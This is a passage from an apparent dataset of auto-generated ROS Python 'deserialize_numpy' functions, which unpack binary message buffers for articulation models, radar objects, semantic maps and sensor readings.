std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v45 = val1.stamp\n _x = _v45\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_projected = []\n for i in range(0, length):\n val1 = 
geometry_msgs.msg.Pose()\n _v46 = val1.position\n _x = _v46\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v47 = val1.orientation\n _x = _v47\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v48 = val1.position\n _x = _v48\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v49 = val1.orientation\n _x = _v49\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model.track.pose_flags = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.model.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data.header.seq, _x.data.header.stamp.secs, _x.data.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.name = str[start:end].decode('utf-8')\n else:\n self.data.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data.track.header.seq, _x.data.track.header.stamp.secs, _x.data.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v50 = val1.position\n _x = _v50\n start = end\n end 
+= 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v51 = val1.orientation\n _x = _v51\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v52 = val1.stamp\n _x = _v52\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.data.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v53 = val1.position\n _x = _v53\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v54 = val1.orientation\n _x = _v54\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v55 = val1.position\n _x = _v55\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v56 = val1.orientation\n _x = _v56\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data.track.pose_flags = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.data.track.channels.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.model_aligned is None:\n self.model_aligned = articulation_msgs.msg.ModelMsg()\n if self.data_aligned is None:\n self.data_aligned = articulation_msgs.msg.ModelMsg()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.model_aligned.header.seq, _x.model_aligned.header.stamp.secs, _x.model_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) 
= _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.name = str[start:end].decode('utf-8')\n else:\n self.model_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.model_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.model_aligned.track.header.seq, _x.model_aligned.track.header.stamp.secs, _x.model_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.model_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.model_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.model_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v99 = val1.position\n _x = _v99\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v100 = val1.orientation\n _x = _v100\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v101 = val1.stamp\n _x = _v101\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n self.model_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v102 = val1.position\n _x = _v102\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v103 = val1.orientation\n _x = _v103\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v104 = val1.position\n _x = _v104\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v105 = val1.orientation\n _x = _v105\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.model_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.model_aligned.track.pose_flags = numpy.frombuffer(str[start:end], 
dtype=numpy.uint32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.model_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.model_aligned.track.channels.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.header.seq, _x.data_aligned.header.stamp.secs, _x.data_aligned.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.name = str[start:end].decode('utf-8')\n else:\n self.data_aligned.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.params = []\n for i in range(0, length):\n val1 = articulation_msgs.msg.ParamMsg()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n _x = val1\n start = end\n end += 9\n (_x.value, _x.type,) = _struct_dB.unpack(str[start:end])\n self.data_aligned.params.append(val1)\n _x = self\n start = end\n end += 12\n (_x.data_aligned.track.header.seq, _x.data_aligned.track.header.stamp.secs, _x.data_aligned.track.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.data_aligned.track.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.data_aligned.track.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.data_aligned.track.id,) = _struct_i.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v106 = val1.position\n _x = _v106\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v107 = val1.orientation\n _x = _v107\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_headers = []\n for i in range(0, length):\n val1 = std_msgs.msg.Header()\n start = end\n end += 4\n (val1.seq,) = _struct_I.unpack(str[start:end])\n _v108 = val1.stamp\n _x = _v108\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.frame_id = str[start:end].decode('utf-8')\n else:\n val1.frame_id = str[start:end]\n 
self.data_aligned.track.pose_headers.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_projected = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v109 = val1.position\n _x = _v109\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v110 = val1.orientation\n _x = _v110\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_projected.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.pose_resampled = []\n for i in range(0, length):\n val1 = geometry_msgs.msg.Pose()\n _v111 = val1.position\n _x = _v111\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v112 = val1.orientation\n _x = _v112\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n self.data_aligned.track.pose_resampled.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sI'%length\n start = end\n end += struct.calcsize(pattern)\n self.data_aligned.track.pose_flags = numpy.frombuffer(str[start:end], dtype=numpy.uint32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_aligned.track.channels = []\n for i in range(0, length):\n val1 = sensor_msgs.msg.ChannelFloat32()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n end += struct.calcsize(pattern)\n val1.values = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n self.data_aligned.track.channels.append(val1)\n start = end\n end += 72\n self.R = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=9)\n start = end\n end += 24\n self.T = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=3)\n _x = self\n start = end\n end += 12\n (_x.dist_rot, _x.dist_trans,) = _struct_df.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 34\n (_x.sensorId, _x.id, _x.length, _x.width, _x.measstat, _x.existprob, _x.dynprop, _x.latdisp, _x.longdisp, _x.relxdot, _x.relxddot, _x.latspeed, _x.obsprob, _x.rollcount, _x.rcs,) = _struct_H6B5f2Bf.unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n end = 0\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.tsp_turtles = str[start:end].decode('utf-8')\n else:\n self.tsp_turtles = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n 
start = end\n end += length\n if python3:\n self.conveyor_turtle = str[start:end].decode('utf-8')\n else:\n self.conveyor_turtle = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.catch_turtle = str[start:end].decode('utf-8')\n else:\n self.catch_turtle = str[start:end]\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n _x = self\n start = end\n end += 56\n (_x.command, _x.set_num, _x.paraset_byte54, _x.paraset_byte53, _x.paraset_byte52, _x.paraset_byte51, _x.paraset_byte50, _x.paraset_byte49, _x.paraset_byte48, _x.paraset_byte47, _x.paraset_byte46, _x.paraset_byte45, _x.paraset_byte44, _x.paraset_byte43, _x.paraset_byte42, _x.paraset_byte41, _x.paraset_byte40, _x.paraset_byte39, _x.paraset_byte38, _x.paraset_byte37, _x.paraset_byte36, _x.paraset_byte35, _x.paraset_byte34, _x.paraset_byte33, _x.paraset_byte32, _x.paraset_byte31, _x.paraset_byte30, _x.paraset_byte29, _x.paraset_byte28, _x.paraset_byte27, _x.paraset_byte26, _x.paraset_byte25, _x.paraset_byte24, _x.paraset_byte23, _x.paraset_byte22, _x.paraset_byte21, _x.paraset_byte20, _x.paraset_byte19, _x.paraset_byte18, _x.paraset_byte17, _x.paraset_byte16, _x.paraset_byte15, _x.paraset_byte14, _x.paraset_byte13, _x.paraset_byte12, _x.paraset_byte11, _x.paraset_byte10, _x.paraset_byte9, _x.paraset_byte8, _x.paraset_byte7, _x.paraset_byte6, _x.paraset_byte5, _x.paraset_byte4, _x.paraset_byte3, _x.paraset_byte2, _x.paraset_byte1,) = _get_struct_56B().unpack(str[start:end])\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.prefixes is None:\n self.prefixes = None\n if self.address is None:\n self.address = knowrob_semantic_map_msgs.msg.SemMapAddress()\n if self.objects is None:\n self.objects = None\n if self.actions is None:\n self.actions = None\n if self.object_properties is None:\n self.object_properties = None\n if self.data_properties is None:\n self.data_properties = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.namespace = str[start:end].decode('utf-8')\n else:\n self.namespace = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.id = str[start:end].decode('utf-8')\n else:\n self.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.prefixes = []\n for i 
in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapPrefix()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.name = str[start:end].decode('utf-8')\n else:\n val1.name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.prefix = str[start:end].decode('utf-8')\n else:\n val1.prefix = str[start:end]\n self.prefixes.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.imports = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1 = str[start:end].decode('utf-8')\n else:\n val1 = str[start:end]\n self.imports.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.room_nr = str[start:end].decode('utf-8')\n else:\n self.address.room_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.floor_nr = str[start:end].decode('utf-8')\n else:\n self.address.floor_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.street_nr = str[start:end].decode('utf-8')\n else:\n self.address.street_nr = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.street_name = str[start:end].decode('utf-8')\n else:\n self.address.street_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.address.city_name = str[start:end].decode('utf-8')\n else:\n self.address.city_name = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.objects = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapObject()\n _v19 = val1.header\n start = end\n end += 4\n (_v19.seq,) = _struct_I.unpack(str[start:end])\n _v20 = _v19.stamp\n _x = _v20\n start = end\n end += 8\n (_x.secs, _x.nsecs,) = _struct_2I.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n _v19.frame_id = str[start:end].decode('utf-8')\n else:\n _v19.frame_id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.type = str[start:end].decode('utf-8')\n else:\n val1.type = str[start:end]\n _v21 = val1.size\n _x = _v21\n start = end\n end += 12\n (_x.x, _x.y, _x.z,) = _struct_3f.unpack(str[start:end])\n _v22 = val1.pose\n _v23 = _v22.position\n _x = _v23\n start = end\n end += 24\n (_x.x, _x.y, _x.z,) = _struct_3d.unpack(str[start:end])\n _v24 = _v22.orientation\n _x = _v24\n start = end\n end += 32\n (_x.x, _x.y, _x.z, _x.w,) = _struct_4d.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.part_of = str[start:end].decode('utf-8')\n else:\n val1.part_of = str[start:end]\n 
self.objects.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.actions = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapAction()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.type = str[start:end].decode('utf-8')\n else:\n val1.type = str[start:end]\n start = end\n end += 1\n (val1.asserted,) = _struct_B.unpack(str[start:end])\n val1.asserted = bool(val1.asserted)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object_acted_on = str[start:end].decode('utf-8')\n else:\n val1.object_acted_on = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n val1.subactions = []\n for i in range(0, length):\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val2 = str[start:end].decode('utf-8')\n else:\n val2 = str[start:end]\n val1.subactions.append(val2)\n _x = val1\n start = end\n end += 2\n (_x.quantification, _x.unordered,) = _struct_bB.unpack(str[start:end])\n val1.unordered = bool(val1.unordered)\n self.actions.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.object_properties = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapObjectProperty()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.subject = str[start:end].decode('utf-8')\n else:\n val1.subject = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.object = str[start:end].decode('utf-8')\n else:\n val1.object = str[start:end]\n self.object_properties.append(val1)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n self.data_properties = []\n for i in range(0, length):\n val1 = knowrob_semantic_map_msgs.msg.SemMapDataProperty()\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.id = str[start:end].decode('utf-8')\n else:\n val1.id = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.subject = str[start:end].decode('utf-8')\n else:\n val1.subject = str[start:end]\n start = end\n end += 1\n (val1.value_type,) = _struct_B.unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n val1.value = str[start:end].decode('utf-8')\n else:\n val1.value = str[start:end]\n self.data_properties.append(val1)\n return self\n except struct.error as e:\n raise genpy.DeserializationError(e) #most likely buffer underfill", "def deserialize_numpy(self, str, numpy):\n codecs.lookup_error(\"rosmsg\").msg_type = self._type\n try:\n if self.header is None:\n self.header = std_msgs.msg.Header()\n if self.type is None:\n self.type = std_msgs.msg.String()\n if self.parent_name is 
None:\n self.parent_name = std_msgs.msg.String()\n if self.name is None:\n self.name = std_msgs.msg.String()\n if self.pose is None:\n self.pose = geometry_msgs.msg.Pose()\n if self.sensed_objects is None:\n self.sensed_objects = None\n end = 0\n _x = self\n start = end\n end += 12\n (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _get_struct_3I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.header.frame_id = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.header.frame_id = str[start:end]\n start = end\n end += 4\n (self.sim_step,) = _get_struct_I().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.type.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.type.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.parent_name.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.parent_name.data = str[start:end]\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n start = end\n end += length\n if python3:\n self.name.data = str[start:end].decode('utf-8', 'rosmsg')\n else:\n self.name.data = str[start:end]\n _x = self\n start = end\n end += 68\n (_x.wall_time, _x.sim_time, _x.pose.position.x, _x.pose.position.y, _x.pose.position.z, _x.pose.orientation.x, _x.pose.orientation.y, _x.pose.orientation.z, _x.pose.orientation.w, _x.count,) = _get_struct_2f7dI().unpack(str[start:end])\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sB'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.triggered = numpy.frombuffer(str[start:end], dtype=numpy.bool, count=length)\n self.triggered = list(map(bool, self.triggered))\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.range = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n pattern = '<%sf'%length\n start = end\n s = struct.Struct(pattern)\n end += s.size\n self.measurement = numpy.frombuffer(str[start:end], dtype=numpy.float32, count=length)\n start = end\n end += 4\n (length,) = _struct_I.unpack(str[start:end])\n 